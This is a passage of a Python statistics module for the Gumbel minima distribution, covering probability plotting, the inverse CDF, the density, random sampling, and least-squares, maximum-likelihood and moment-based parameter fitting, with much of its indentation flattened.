save figure to file, default None
"""
figure()
x = np.sort(self.data)
# sample
        # linearising transform for the minima distribution F(x) = 1 - exp(-exp(z)): z = ln(-ln(1 - F))
        z_data = np.log(-np.log(1. - self.ecdf))
plot(x, z_data, 'ko', label='Data')
# fit distributions
a_msm, b_msm = msm(self.data)
a_mle, b_mle = mle(self.data)
a_lse, b_lse = lse(self.data)
z_msm = (x - a_msm) / b_msm
z_mle = (x - a_mle) / b_mle
z_lse = (x - a_lse) / b_lse
plot(x, z_msm, '-r', label='MSM')
plot(x, z_mle, '--g', label='MLE')
plot(x, z_lse, ':b', label='LSE')
# plotting positions and plot configurations
p = np.array([0.1, 0.2, 0.5, 0.7, 0.8, 0.9, 0.95, 0.99, 0.999, 0.9999])
        y = np.log(-np.log(1. - p))
yticks(y, p)
legend(loc='upper left')
ylim(y[0], y[-1])
xlabel('X')
ylabel('Cumulative probability')
grid(True)
if showfig:
show()
elif save is not None:
savefig(save)
else:
pass
def invcdf(self, p=None):
"""
Inverse cumulative distribution function for specified quantiles p
Parameters
----------
p : array_like
quantiles (or. cumulative probabilities if you like)
Returns
-------
x : array
values corresponding to the specified quantiles
Notes
-----
A range of quantiles from 0.001 to 0.999 are applied if quantiles are not specified
"""
try:
if p is None:
p = np.linspace(0.001, 0.999, 100)
else:
p = np.array(p)
assert self.scale > 0., "The scale parameter must be larger than 0."
x = np.zeros(np.shape(p))
x[p == 1.] = np.inf # asymptotic
x[(p < 0.) | (p > 1.)] = np.nan # probabilities out of bounds
z = (p >= 0.) & (p < 1.) # valid quantile range
x[z] = self.location + self.scale * np.log(-np.log(1.-p[z]))
return x
except TypeError:
print("Distribution parameters are not defined")
def pdf(self, x=None):
"""
Probability density function for specified values x
Parameters
----------
x : array_like
values
Returns
-------
pdf : array
probability density function for specified values x
Notes
-----
        A range of x values [location - 3*std, location] is applied if x is not specified.
"""
try:
if x is None:
            x = np.linspace(self.location, self.location - 3. * self.std, 100)
else:
x = np.array(x)
assert self.scale > 0., "The scale parameter must be larger than 0."
z = (x - self.location) / self.scale
p = (1. / self.scale) * np.exp(z - np.exp(z))
return p
except TypeError:
print("Distribution parameters are not defined")
def plot(self, showfig=True, save=None):
"""
Plot data on regular scales
Parameters
----------
showfig : bool
show figure immediately on screen, default True
save : filename including suffix
save figure to file, default None
"""
figure()
if self.data is not None:
plot(np.sort(self.data), self.ecdf, 'ko', label='Data')
y = np.linspace(0.001, 0.9999, 1000)
x = self.invcdf(p=y)
plot(x, y, '-r', label='Fitted')
xlabel('X')
ylabel('Cumulative probability')
legend(loc='upper left')
grid(True)
if showfig:
show()
elif save is not None:
savefig(save)
else:
pass
def rnd(self, size=None, seed=None):
"""
Draw random samples from probability distribution
Parameters
----------
size : int|numpy shape, optional
sample size (default 1 random value is returned)
seed : int
seed for random number generator (default seed is random)
Returns
-------
x : array
random sample
"""
if seed is not None:
np.random.seed(seed)
r = np.random.random_sample(size)
x = self.invcdf(p=r)
return x
def lse(x):
"""
Fit distribution parameters to sample by method of least square fit to empirical cdf
Parameters
----------
x : array_like
sample
Notes
-----
Uses an approximate median rank estimate for the empirical cdf.
"""
x = np.sort(x)
f = empirical_cdf(x.size, kind='median')
fp = lambda v, z: 1. - np.exp(-np.exp((z - v[0]) / v[1])) # parametric Gumbel function
e = lambda v, z, y: (fp(v, z) - y) # error function to be minimized
a0, b0 = msm(x) # initial guess based on method of moments
# least square fit
p, cov, info, msg, ier = leastsq(e, [a0, b0], args=(x, f), full_output=1)
return p[0], p[1]
def mle(x):
"""
Fit distribution parameters to sample by maximum likelihood estimation
Parameters
----------
x : array_like
sample
Notes
-----
    The MLE equation set is given in 'Statistical Distributions' by Forbes et al. (2010) and
    referenced in [4].
"""
def mle_eq(p, z):
"""
MLE equation set
Parameters
----------
p : list
distribution parameters a, b, c
z : array_like
data
"""
loc, scale = p # unpack parameters
n = z.size
        # Gumbel minima MLE equations (the standard maxima equations under the substitution
        # x -> -x); both expressions are zero at the maximum likelihood estimates of (loc, scale).
        out = [loc - scale * np.log(1. / n * np.sum(np.exp(z / scale))),
               np.sum(z * np.exp(z / scale)) / np.sum(np.exp(z / scale)) - z.mean() - scale]
return out
x = np.array(x)
a0, b0 = msm(x) # initial guess
a, b = fsolve(mle_eq, [a0, b0], args=x)
return a, b
def msm(x):
"""
Fit distribution parameters to sample by method of sample moments
Parameters
----------
x : array_like
sample
Notes
-----
See description in [1] and [2].
"""
x = np.array(x)
b = np.sqrt(6.) * np.std(x, ddof=1) / np.pi # using the unbiased sample standard deviation
a = x.mean() + em() * b
return a, b
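# Example (illustrative; the parameter values and sample size below are arbitrary assumptions):
#
#     >>> from qats.stats.gumbelmin import GumbelMin, msm, lse, mle
#     >>> true_dist = GumbelMin(loc=10., scale=2.)
#     >>> sample = true_dist.rnd(size=1000, seed=1)   # draw a synthetic sample
#     >>> msm(sample)                                 # method of sample moments
#     >>> lse(sample)                                 # least-squares fit to the empirical cdf
#     >>> mle(sample)                                 # maximum likelihood estimation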
|